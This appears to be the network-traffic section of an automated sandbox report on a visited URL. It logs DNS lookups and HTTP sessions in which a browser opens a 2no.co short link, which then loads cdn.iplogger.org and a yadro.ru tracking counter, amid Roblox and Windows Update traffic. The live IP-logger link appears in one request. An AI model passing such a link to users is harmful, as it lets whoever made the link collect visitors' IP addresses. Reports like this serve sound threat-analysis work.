                                                                            Jul 30, 2024 00:59:09.956470966 CEST58797443192.168.2.640.113.110.67
                                                                            Jul 30, 2024 00:59:09.956492901 CEST4435879740.113.110.67192.168.2.6
                                                                            Jul 30, 2024 00:59:09.957078934 CEST4435879740.113.110.67192.168.2.6
                                                                            Jul 30, 2024 00:59:09.961766005 CEST58797443192.168.2.640.113.110.67
                                                                            Jul 30, 2024 00:59:09.961766005 CEST58797443192.168.2.640.113.110.67
                                                                            Jul 30, 2024 00:59:09.961766005 CEST58797443192.168.2.640.113.110.67
                                                                            Jul 30, 2024 00:59:09.961786032 CEST4435879740.113.110.67192.168.2.6
                                                                            Jul 30, 2024 00:59:10.008497000 CEST4435879740.113.110.67192.168.2.6
                                                                            Jul 30, 2024 00:59:10.145749092 CEST4435879740.113.110.67192.168.2.6
                                                                            Jul 30, 2024 00:59:10.145991087 CEST4435879740.113.110.67192.168.2.6
                                                                            Jul 30, 2024 00:59:10.146059990 CEST58797443192.168.2.640.113.110.67
                                                                            Jul 30, 2024 00:59:10.146245956 CEST58797443192.168.2.640.113.110.67
                                                                            Jul 30, 2024 00:59:16.563091040 CEST58801443192.168.2.613.32.110.82
                                                                            Jul 30, 2024 00:59:16.563132048 CEST4435880113.32.110.82192.168.2.6
                                                                            Jul 30, 2024 00:59:16.563235044 CEST58801443192.168.2.613.32.110.82
                                                                            Jul 30, 2024 00:59:16.565164089 CEST58801443192.168.2.613.32.110.82
                                                                            Jul 30, 2024 00:59:16.565176010 CEST4435880113.32.110.82192.168.2.6
                                                                            Jul 30, 2024 00:59:17.331162930 CEST4435880113.32.110.82192.168.2.6
                                                                            Jul 30, 2024 00:59:17.332058907 CEST58801443192.168.2.613.32.110.82
                                                                            Jul 30, 2024 00:59:17.332113981 CEST4435880113.32.110.82192.168.2.6
                                                                            Jul 30, 2024 00:59:17.333882093 CEST4435880113.32.110.82192.168.2.6
                                                                            Jul 30, 2024 00:59:17.333955050 CEST58801443192.168.2.613.32.110.82
                                                                            Jul 30, 2024 00:59:17.335726976 CEST58801443192.168.2.613.32.110.82
                                                                            Jul 30, 2024 00:59:17.335928917 CEST58801443192.168.2.613.32.110.82
                                                                            Jul 30, 2024 00:59:17.335936069 CEST4435880113.32.110.82192.168.2.6
                                                                            Jul 30, 2024 00:59:17.336030960 CEST58801443192.168.2.613.32.110.82
                                                                            Jul 30, 2024 00:59:19.899090052 CEST58804443192.168.2.6128.116.21.4
                                                                            Jul 30, 2024 00:59:19.899132967 CEST44358804128.116.21.4192.168.2.6
                                                                            Jul 30, 2024 00:59:19.900010109 CEST58804443192.168.2.6128.116.21.4
                                                                            Jul 30, 2024 00:59:19.901248932 CEST58804443192.168.2.6128.116.21.4
                                                                            Jul 30, 2024 00:59:19.901266098 CEST44358804128.116.21.4192.168.2.6
                                                                            Jul 30, 2024 00:59:20.686125994 CEST44358804128.116.21.4192.168.2.6
                                                                            Jul 30, 2024 00:59:20.686938047 CEST58804443192.168.2.6128.116.21.4
                                                                            Jul 30, 2024 00:59:20.686960936 CEST44358804128.116.21.4192.168.2.6
                                                                            Jul 30, 2024 00:59:20.688011885 CEST44358804128.116.21.4192.168.2.6
                                                                            Jul 30, 2024 00:59:20.688069105 CEST58804443192.168.2.6128.116.21.4
                                                                            Jul 30, 2024 00:59:20.690402031 CEST58804443192.168.2.6128.116.21.4
                                                                            Jul 30, 2024 00:59:20.690558910 CEST58804443192.168.2.6128.116.21.4
                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                            Jul 30, 2024 00:56:33.361526012 CEST5125653192.168.2.61.1.1.1
                                                                            Jul 30, 2024 00:56:33.379079103 CEST53512561.1.1.1192.168.2.6
                                                                            Jul 30, 2024 00:56:34.127734900 CEST5891853192.168.2.61.1.1.1
                                                                            Jul 30, 2024 00:56:34.146291971 CEST53589181.1.1.1192.168.2.6
                                                                            Jul 30, 2024 00:56:35.067919970 CEST6534153192.168.2.61.1.1.1
                                                                            Jul 30, 2024 00:56:48.308696032 CEST5151853192.168.2.61.1.1.1
                                                                            Jul 30, 2024 00:56:48.308979988 CEST5311553192.168.2.61.1.1.1
                                                                            Jul 30, 2024 00:56:48.429425001 CEST53650731.1.1.1192.168.2.6
                                                                            Jul 30, 2024 00:56:48.429920912 CEST53597151.1.1.1192.168.2.6
                                                                            Jul 30, 2024 00:56:48.432893038 CEST53531151.1.1.1192.168.2.6
                                                                            Jul 30, 2024 00:56:48.434175014 CEST53515181.1.1.1192.168.2.6
                                                                            Jul 30, 2024 00:56:49.704432964 CEST6421353192.168.2.61.1.1.1
                                                                            Jul 30, 2024 00:56:49.704626083 CEST6175953192.168.2.61.1.1.1
                                                                            Jul 30, 2024 00:56:49.724371910 CEST53642131.1.1.1192.168.2.6
                                                                            Jul 30, 2024 00:56:49.724828005 CEST53617591.1.1.1192.168.2.6
                                                                            Jul 30, 2024 00:56:49.730747938 CEST5902653192.168.2.61.1.1.1
                                                                            Jul 30, 2024 00:56:49.731116056 CEST5190553192.168.2.61.1.1.1
                                                                            Jul 30, 2024 00:56:49.748725891 CEST53590261.1.1.1192.168.2.6
                                                                            Jul 30, 2024 00:56:49.748974085 CEST53519051.1.1.1192.168.2.6
                                                                            Jul 30, 2024 00:56:49.775507927 CEST53559601.1.1.1192.168.2.6
                                                                            Jul 30, 2024 00:56:50.369602919 CEST6434453192.168.2.61.1.1.1
                                                                            Jul 30, 2024 00:56:50.369925976 CEST5264853192.168.2.61.1.1.1
                                                                            Jul 30, 2024 00:56:50.388063908 CEST53643441.1.1.1192.168.2.6
                                                                            Jul 30, 2024 00:56:50.388122082 CEST53526481.1.1.1192.168.2.6
                                                                            Jul 30, 2024 00:56:52.184640884 CEST6239753192.168.2.61.1.1.1
                                                                            Jul 30, 2024 00:56:52.184813976 CEST6018653192.168.2.61.1.1.1
                                                                            Jul 30, 2024 00:56:52.202683926 CEST53601861.1.1.1192.168.2.6
                                                                            Jul 30, 2024 00:56:52.202953100 CEST53623971.1.1.1192.168.2.6
                                                                            Jul 30, 2024 00:56:52.630474091 CEST6235553192.168.2.61.1.1.1
                                                                            Jul 30, 2024 00:56:52.631124020 CEST6022353192.168.2.61.1.1.1
                                                                            Jul 30, 2024 00:56:52.648118019 CEST53623551.1.1.1192.168.2.6
                                                                            Jul 30, 2024 00:56:52.648458958 CEST53602231.1.1.1192.168.2.6
                                                                            Jul 30, 2024 00:56:52.874556065 CEST6546853192.168.2.61.1.1.1
                                                                            Jul 30, 2024 00:56:52.874861002 CEST6229253192.168.2.61.1.1.1
                                                                            Jul 30, 2024 00:56:52.893346071 CEST53654681.1.1.1192.168.2.6
                                                                            Jul 30, 2024 00:56:52.895145893 CEST53622921.1.1.1192.168.2.6
                                                                            Jul 30, 2024 00:57:06.691802979 CEST53586801.1.1.1192.168.2.6
                                                                            Jul 30, 2024 00:57:25.640033960 CEST53569741.1.1.1192.168.2.6
                                                                            Jul 30, 2024 00:57:47.858498096 CEST53519221.1.1.1192.168.2.6
                                                                            Jul 30, 2024 00:57:48.175936937 CEST53569151.1.1.1192.168.2.6
                                                                            Jul 30, 2024 00:57:57.008881092 CEST53571551.1.1.1192.168.2.6
                                                                            Jul 30, 2024 00:58:07.593827009 CEST5707753192.168.2.61.1.1.1
                                                                            Jul 30, 2024 00:59:10.476824999 CEST53537031.1.1.1192.168.2.6
                                                                            Jul 30, 2024 00:59:16.543349028 CEST5060053192.168.2.61.1.1.1
                                                                            Jul 30, 2024 00:59:16.561095953 CEST53506001.1.1.1192.168.2.6
                                                                            Jul 30, 2024 00:59:19.864056110 CEST5641053192.168.2.61.1.1.1
                                                                            Jul 30, 2024 00:59:19.881989002 CEST53564101.1.1.1192.168.2.6
| Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
|---|---|---|---|---|---|---|---|---|
| Jul 30, 2024 00:56:33.361526012 CEST | 192.168.2.6 | 1.1.1.1 | 0xa2e1 | Standard query (0) | client-telemetry.roblox.com | A (IP address) | IN (0x0001) | false |
| Jul 30, 2024 00:56:34.127734900 CEST | 192.168.2.6 | 1.1.1.1 | 0x9a3c | Standard query (0) | ecsv2.roblox.com | A (IP address) | IN (0x0001) | false |
| Jul 30, 2024 00:56:35.067919970 CEST | 192.168.2.6 | 1.1.1.1 | 0xb1a1 | Standard query (0) | clientsettingscdn.roblox.com | A (IP address) | IN (0x0001) | false |
| Jul 30, 2024 00:56:48.308696032 CEST | 192.168.2.6 | 1.1.1.1 | 0x6fb3 | Standard query (0) | 2no.co | A (IP address) | IN (0x0001) | false |
| Jul 30, 2024 00:56:48.308979988 CEST | 192.168.2.6 | 1.1.1.1 | 0xd09 | Standard query (0) | 2no.co | 65 | IN (0x0001) | false |
| Jul 30, 2024 00:56:49.704432964 CEST | 192.168.2.6 | 1.1.1.1 | 0x51fb | Standard query (0) | cdn.iplogger.org | A (IP address) | IN (0x0001) | false |
| Jul 30, 2024 00:56:49.704626083 CEST | 192.168.2.6 | 1.1.1.1 | 0x729b | Standard query (0) | cdn.iplogger.org | 65 | IN (0x0001) | false |
| Jul 30, 2024 00:56:49.730747938 CEST | 192.168.2.6 | 1.1.1.1 | 0x95bd | Standard query (0) | counter.yadro.ru | A (IP address) | IN (0x0001) | false |
| Jul 30, 2024 00:56:49.731116056 CEST | 192.168.2.6 | 1.1.1.1 | 0x5d2 | Standard query (0) | counter.yadro.ru | 65 | IN (0x0001) | false |
| Jul 30, 2024 00:56:50.369602919 CEST | 192.168.2.6 | 1.1.1.1 | 0xb3b0 | Standard query (0) | a.nel.cloudflare.com | A (IP address) | IN (0x0001) | false |
| Jul 30, 2024 00:56:50.369925976 CEST | 192.168.2.6 | 1.1.1.1 | 0x5816 | Standard query (0) | a.nel.cloudflare.com | 65 | IN (0x0001) | false |
| Jul 30, 2024 00:56:52.184640884 CEST | 192.168.2.6 | 1.1.1.1 | 0x6fe4 | Standard query (0) | counter.yadro.ru | A (IP address) | IN (0x0001) | false |
| Jul 30, 2024 00:56:52.184813976 CEST | 192.168.2.6 | 1.1.1.1 | 0xa708 | Standard query (0) | counter.yadro.ru | 65 | IN (0x0001) | false |
| Jul 30, 2024 00:56:52.630474091 CEST | 192.168.2.6 | 1.1.1.1 | 0x361f | Standard query (0) | www.google.com | A (IP address) | IN (0x0001) | false |
| Jul 30, 2024 00:56:52.631124020 CEST | 192.168.2.6 | 1.1.1.1 | 0xc7eb | Standard query (0) | www.google.com | 65 | IN (0x0001) | false |
| Jul 30, 2024 00:56:52.874556065 CEST | 192.168.2.6 | 1.1.1.1 | 0x7579 | Standard query (0) | cdn.iplogger.org | A (IP address) | IN (0x0001) | false |
| Jul 30, 2024 00:56:52.874861002 CEST | 192.168.2.6 | 1.1.1.1 | 0x5ef1 | Standard query (0) | cdn.iplogger.org | 65 | IN (0x0001) | false |
| Jul 30, 2024 00:58:07.593827009 CEST | 192.168.2.6 | 1.1.1.1 | 0x207 | Standard query (0) | clientsettingscdn.roblox.com | A (IP address) | IN (0x0001) | false |
| Jul 30, 2024 00:59:16.543349028 CEST | 192.168.2.6 | 1.1.1.1 | 0x754e | Standard query (0) | clientsettingscdn.roblox.com | A (IP address) | IN (0x0001) | false |
| Jul 30, 2024 00:59:19.864056110 CEST | 192.168.2.6 | 1.1.1.1 | 0x4fb8 | Standard query (0) | client-telemetry.roblox.com | A (IP address) | IN (0x0001) | false |
| Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS |
|---|---|---|---|---|---|---|---|---|---|---|
| Jul 30, 2024 00:56:33.379079103 CEST | 1.1.1.1 | 192.168.2.6 | 0xa2e1 | No error (0) | client-telemetry.roblox.com | titanium.roblox.com | | CNAME (Canonical name) | IN (0x0001) | false |
| Jul 30, 2024 00:56:33.379079103 CEST | 1.1.1.1 | 192.168.2.6 | 0xa2e1 | No error (0) | titanium.roblox.com | edge-term4.roblox.com | | CNAME (Canonical name) | IN (0x0001) | false |
| Jul 30, 2024 00:56:33.379079103 CEST | 1.1.1.1 | 192.168.2.6 | 0xa2e1 | No error (0) | edge-term4.roblox.com | edge-term4-ams2.roblox.com | | CNAME (Canonical name) | IN (0x0001) | false |
| Jul 30, 2024 00:56:33.379079103 CEST | 1.1.1.1 | 192.168.2.6 | 0xa2e1 | No error (0) | edge-term4-ams2.roblox.com | | 128.116.21.3 | A (IP address) | IN (0x0001) | false |
| Jul 30, 2024 00:56:34.146291971 CEST | 1.1.1.1 | 192.168.2.6 | 0x9a3c | No error (0) | ecsv2.roblox.com | titanium.roblox.com | | CNAME (Canonical name) | IN (0x0001) | false |
| Jul 30, 2024 00:56:34.146291971 CEST | 1.1.1.1 | 192.168.2.6 | 0x9a3c | No error (0) | titanium.roblox.com | edge-term4.roblox.com | | CNAME (Canonical name) | IN (0x0001) | false |
| Jul 30, 2024 00:56:34.146291971 CEST | 1.1.1.1 | 192.168.2.6 | 0x9a3c | No error (0) | edge-term4.roblox.com | edge-term4-ams2.roblox.com | | CNAME (Canonical name) | IN (0x0001) | false |
| Jul 30, 2024 00:56:34.146291971 CEST | 1.1.1.1 | 192.168.2.6 | 0x9a3c | No error (0) | edge-term4-ams2.roblox.com | | 128.116.21.4 | A (IP address) | IN (0x0001) | false |
| Jul 30, 2024 00:56:35.085570097 CEST | 1.1.1.1 | 192.168.2.6 | 0xb1a1 | No error (0) | clientsettingscdn.roblox.com | clientsettingscdn.roblox.com.edgekey.net | | CNAME (Canonical name) | IN (0x0001) | false |
| Jul 30, 2024 00:56:48.432893038 CEST | 1.1.1.1 | 192.168.2.6 | 0xd09 | No error (0) | 2no.co | | | 65 | IN (0x0001) | false |
| Jul 30, 2024 00:56:48.434175014 CEST | 1.1.1.1 | 192.168.2.6 | 0x6fb3 | No error (0) | 2no.co | | 104.21.79.229 | A (IP address) | IN (0x0001) | false |
| Jul 30, 2024 00:56:48.434175014 CEST | 1.1.1.1 | 192.168.2.6 | 0x6fb3 | No error (0) | 2no.co | | 172.67.149.76 | A (IP address) | IN (0x0001) | false |
| Jul 30, 2024 00:56:49.724371910 CEST | 1.1.1.1 | 192.168.2.6 | 0x51fb | No error (0) | cdn.iplogger.org | | 172.67.132.113 | A (IP address) | IN (0x0001) | false |
| Jul 30, 2024 00:56:49.724371910 CEST | 1.1.1.1 | 192.168.2.6 | 0x51fb | No error (0) | cdn.iplogger.org | | 104.21.4.208 | A (IP address) | IN (0x0001) | false |
| Jul 30, 2024 00:56:49.724828005 CEST | 1.1.1.1 | 192.168.2.6 | 0x729b | No error (0) | cdn.iplogger.org | | | 65 | IN (0x0001) | false |
                                                                            Jul 30, 2024 00:56:49.748725891 CEST1.1.1.1192.168.2.60x95bdNo error (0)counter.yadro.ru88.212.201.204A (IP address)IN (0x0001)false
                                                                            Jul 30, 2024 00:56:49.748725891 CEST1.1.1.1192.168.2.60x95bdNo error (0)counter.yadro.ru88.212.201.198A (IP address)IN (0x0001)false
                                                                            Jul 30, 2024 00:56:49.748725891 CEST1.1.1.1192.168.2.60x95bdNo error (0)counter.yadro.ru88.212.202.52A (IP address)IN (0x0001)false
                                                                            Jul 30, 2024 00:56:50.388063908 CEST1.1.1.1192.168.2.60xb3b0No error (0)a.nel.cloudflare.com35.190.80.1A (IP address)IN (0x0001)false
                                                                            Jul 30, 2024 00:56:52.202953100 CEST1.1.1.1192.168.2.60x6fe4No error (0)counter.yadro.ru88.212.201.198A (IP address)IN (0x0001)false
                                                                            Jul 30, 2024 00:56:52.202953100 CEST1.1.1.1192.168.2.60x6fe4No error (0)counter.yadro.ru88.212.201.204A (IP address)IN (0x0001)false
                                                                            Jul 30, 2024 00:56:52.202953100 CEST1.1.1.1192.168.2.60x6fe4No error (0)counter.yadro.ru88.212.202.52A (IP address)IN (0x0001)false
                                                                            Jul 30, 2024 00:56:52.648118019 CEST1.1.1.1192.168.2.60x361fNo error (0)www.google.com142.250.186.100A (IP address)IN (0x0001)false
                                                                            Jul 30, 2024 00:56:52.648458958 CEST1.1.1.1192.168.2.60xc7ebNo error (0)www.google.com65IN (0x0001)false
                                                                            Jul 30, 2024 00:56:52.893346071 CEST1.1.1.1192.168.2.60x7579No error (0)cdn.iplogger.org172.67.132.113A (IP address)IN (0x0001)false
                                                                            Jul 30, 2024 00:56:52.893346071 CEST1.1.1.1192.168.2.60x7579No error (0)cdn.iplogger.org104.21.4.208A (IP address)IN (0x0001)false
                                                                            Jul 30, 2024 00:56:52.895145893 CEST1.1.1.1192.168.2.60x5ef1No error (0)cdn.iplogger.org65IN (0x0001)false
                                                                            Jul 30, 2024 00:58:08.045675039 CEST1.1.1.1192.168.2.60x207No error (0)clientsettingscdn.roblox.comclientsettingscdn.roblox.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                            Jul 30, 2024 00:59:16.561095953 CEST1.1.1.1192.168.2.60x754eNo error (0)clientsettingscdn.roblox.comd2v57ias1m20gl.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                            Jul 30, 2024 00:59:16.561095953 CEST1.1.1.1192.168.2.60x754eNo error (0)d2v57ias1m20gl.cloudfront.net13.32.110.82A (IP address)IN (0x0001)false
                                                                            Jul 30, 2024 00:59:16.561095953 CEST1.1.1.1192.168.2.60x754eNo error (0)d2v57ias1m20gl.cloudfront.net13.32.110.9A (IP address)IN (0x0001)false
                                                                            Jul 30, 2024 00:59:16.561095953 CEST1.1.1.1192.168.2.60x754eNo error (0)d2v57ias1m20gl.cloudfront.net13.32.110.128A (IP address)IN (0x0001)false
                                                                            Jul 30, 2024 00:59:16.561095953 CEST1.1.1.1192.168.2.60x754eNo error (0)d2v57ias1m20gl.cloudfront.net13.32.110.101A (IP address)IN (0x0001)false
                                                                            Jul 30, 2024 00:59:19.881989002 CEST1.1.1.1192.168.2.60x4fb8No error (0)client-telemetry.roblox.comtitanium.roblox.comCNAME (Canonical name)IN (0x0001)false
                                                                            Jul 30, 2024 00:59:19.881989002 CEST1.1.1.1192.168.2.60x4fb8No error (0)titanium.roblox.comedge-term4.roblox.comCNAME (Canonical name)IN (0x0001)false
                                                                            Jul 30, 2024 00:59:19.881989002 CEST1.1.1.1192.168.2.60x4fb8No error (0)edge-term4.roblox.comedge-term4-ams2.roblox.comCNAME (Canonical name)IN (0x0001)false
                                                                            Jul 30, 2024 00:59:19.881989002 CEST1.1.1.1192.168.2.60x4fb8No error (0)edge-term4-ams2.roblox.com128.116.21.4A (IP address)IN (0x0001)false
                                                                            • 2no.co
                                                                            • slscr.update.microsoft.com
                                                                            • https:
                                                                              • cdn.iplogger.org
                                                                              • counter.yadro.ru
                                                                              • www.bing.com
                                                                            • a.nel.cloudflare.com
                                                                            • fs.microsoft.com
Session ID  Source IP    Source Port  Destination IP  Destination Port
0           192.168.2.6  49719        40.113.110.67   443


Session ID  Source IP    Source Port  Destination IP  Destination Port
1           192.168.2.6  49720        40.113.110.67   443


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
2           192.168.2.6  49722        104.21.79.229   443               3136  C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp  Bytes transferred  Direction  Data
2024-07-29 22:56:49 UTC  655  OUT
GET /24RXx6 HTTP/1.1
                                                                            Host: 2no.co
                                                                            Connection: keep-alive
                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                            sec-ch-ua-mobile: ?0
                                                                            sec-ch-ua-platform: "Windows"
                                                                            Upgrade-Insecure-Requests: 1
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Sec-Fetch-Site: none
                                                                            Sec-Fetch-Mode: navigate
                                                                            Sec-Fetch-User: ?1
                                                                            Sec-Fetch-Dest: document
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
2024-07-29 22:56:49 UTC  1086  IN
HTTP/1.1 200 OK
                                                                            Date: Mon, 29 Jul 2024 22:56:49 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            set-cookie: 54988964137263905=1; expires=Tue, 29 Jul 2025 22:56:49 GMT; Max-Age=31536000; path=/; secure; HttpOnly; SameSite=Strict
                                                                            set-cookie: unikey=unikey_51eff93770462a1111b7b35d0bba5e996f0fa4018690c0eb9ad2c6a048b0ca7e; path=/; secure; HttpOnly; SameSite=Strict
                                                                            memory: 0.4222412109375
                                                                            expires: Mon, 29 Jul 2024 22:56:49 +0000
                                                                            strict-transport-security: max-age=604800
                                                                            strict-transport-security: max-age=31536000
                                                                            content-security-policy: img-src https: data:; upgrade-insecure-requests
                                                                            x-frame-options: SAMEORIGIN
                                                                            CF-Cache-Status: DYNAMIC
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SEN1AjizI%2FkNXXs81evQjSXc4CtXIzKuVOvNWclC3MgcZ9ovyRY4ObbuSb9OCuMwydCVeEszrqiVEA41z4XjTRVWEfO7FMjEAeLCm35Hjjlw%2FeeNEy0lPzw%3D"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 8ab0b453ae3942f1-EWR
                                                                            alt-svc: h3=":443"; ma=86400


                                                                            Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                            3           192.168.2.6  49730        20.12.23.50     443
                                                                            Timestamp                Bytes transferred  Direction  Data
                                                                            2024-07-29 22:56:50 UTC  306                OUT        GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=Sh9hBMxfPmon+V7&MD=w1bAu+gC HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Accept: */*
                                                                            User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                            Host: slscr.update.microsoft.com
                                                                            2024-07-29 22:56:50 UTC  560                IN         HTTP/1.1 200 OK
                                                                            Cache-Control: no-cache
                                                                            Pragma: no-cache
                                                                            Content-Type: application/octet-stream
                                                                            Expires: -1
                                                                            Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                            ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880"
                                                                            MS-CorrelationId: 11a09548-bc4e-4568-b3a1-3b3efcd7ea3b
                                                                            MS-RequestId: 36432757-a08f-4d7e-9ea4-849ab05674ea
                                                                            MS-CV: 2BFOp1gb4Ua6ufl7.0
                                                                            X-Microsoft-SLSClientCache: 2880
                                                                            Content-Disposition: attachment; filename=environment.cab
                                                                            X-Content-Type-Options: nosniff
                                                                            Date: Mon, 29 Jul 2024 22:56:49 GMT
                                                                            Connection: close
                                                                            Content-Length: 24490


                                                                            Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                            4           192.168.2.6  49732        172.67.132.113  443               3136  C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            Timestamp                Bytes transferred  Direction  Data
                                                                            2024-07-29 22:56:50 UTC  588                OUT        GET /redirect/handshake.png HTTP/1.1
                                                                            Host: cdn.iplogger.org
                                                                            Connection: keep-alive
                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                            sec-ch-ua-mobile: ?0
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                            sec-ch-ua-platform: "Windows"
                                                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                            Sec-Fetch-Site: cross-site
                                                                            Sec-Fetch-Mode: no-cors
                                                                            Sec-Fetch-Dest: image
                                                                            Referer: https://2no.co/
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            2024-07-29 22:56:50 UTC  1285               IN         HTTP/1.1 403 Forbidden
                                                                            Date: Mon, 29 Jul 2024 22:56:50 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                            Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                            Cross-Origin-Embedder-Policy: require-corp
                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                            Cross-Origin-Resource-Policy: same-origin
                                                                            Origin-Agent-Cluster: ?1
                                                                            Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                            Referrer-Policy: same-origin
                                                                            X-Content-Options: nosniff
                                                                            X-Frame-Options: SAMEORIGIN
                                                                            cf-mitigated: challenge


                                                                            Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                            5           192.168.2.6  49733        88.212.201.204  443               3136  C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            Timestamp                Bytes transferred  Direction  Data
                                                                            2024-07-29 22:56:50 UTC  666                OUT        GET /hit?t38.6;r;s1280*1024*24;uhttps%3A//2no.co/redirect-2;hBranded%20Short%20Domain;0.07021634166148738 HTTP/1.1
                                                                            Host: counter.yadro.ru
                                                                            Connection: keep-alive
                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                            sec-ch-ua-mobile: ?0
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                            sec-ch-ua-platform: "Windows"
                                                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                            Sec-Fetch-Site: cross-site
                                                                            Sec-Fetch-Mode: no-cors
                                                                            Sec-Fetch-Dest: image
                                                                            Referer: https://2no.co/
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            2024-07-29 22:56:50 UTC  603                IN         HTTP/1.1 302 Moved Temporarily
                                                                            Server: nginx/1.17.9
                                                                            Date: Mon, 29 Jul 2024 22:56:50 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 32
                                                                            Connection: close
                                                                            Location: https://counter.yadro.ru/hit?q;t38.6;r;s1280*1024*24;uhttps%3A//2no.co/redirect-2;hBranded%20Short%20Domain;0.07021634166148738
                                                                            Expires: Sun, 30 Jul 2023 21:00:00 GMT
                                                                            Pragma: no-cache
                                                                            Cache-control: no-cache
                                                                            P3P: policyref="/w3c/p3p.xml", CP="UNI"
                                                                            Set-Cookie: FTID=1cg1uo1y3WOr1cg1uo00241O; path=/; expires=Tue, 29 Jul 2025 21:00:00 GMT; HttpOnly; Secure; SameSite=None; domain=.yadro.ru
                                                                            Strict-Transport-Security: max-age=86400
                                                                            2024-07-29 22:56:50 UTC  32                 IN         Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 4d 6f 76 65 64 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                            Data Ascii: <html><body>Moved</body></html>


                                                                            Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                            6           192.168.2.6  49739        35.190.80.1     443               3136  C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            Timestamp                Bytes transferred  Direction  Data
                                                                            2024-07-29 22:56:50 UTC  535                OUT        OPTIONS /report/v4?s=wepIYRj6hGg3QGVIT5VH6A70mLLrXrHRIZacHp5Uj9LFm07dm8md12BJjcIUgxXzHYylLEQH6abs8VB7e%2BsKS1HygcQDMquR0M2QLhBEeTy684s%2BdJAkYP%2BfKFsCcxn0guxL HTTP/1.1
                                                                            Host: a.nel.cloudflare.com
                                                                            Connection: keep-alive
                                                                            Origin: https://cdn.iplogger.org
                                                                            Access-Control-Request-Method: POST
                                                                            Access-Control-Request-Headers: content-type
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            2024-07-29 22:56:51 UTC  336                IN         HTTP/1.1 200 OK
                                                                            Content-Length: 0
                                                                            access-control-max-age: 86400
                                                                            access-control-allow-methods: OPTIONS, POST
                                                                            access-control-allow-origin: *
                                                                            access-control-allow-headers: content-type, content-length
                                                                            date: Mon, 29 Jul 2024 22:56:50 GMT
                                                                            Via: 1.1 google
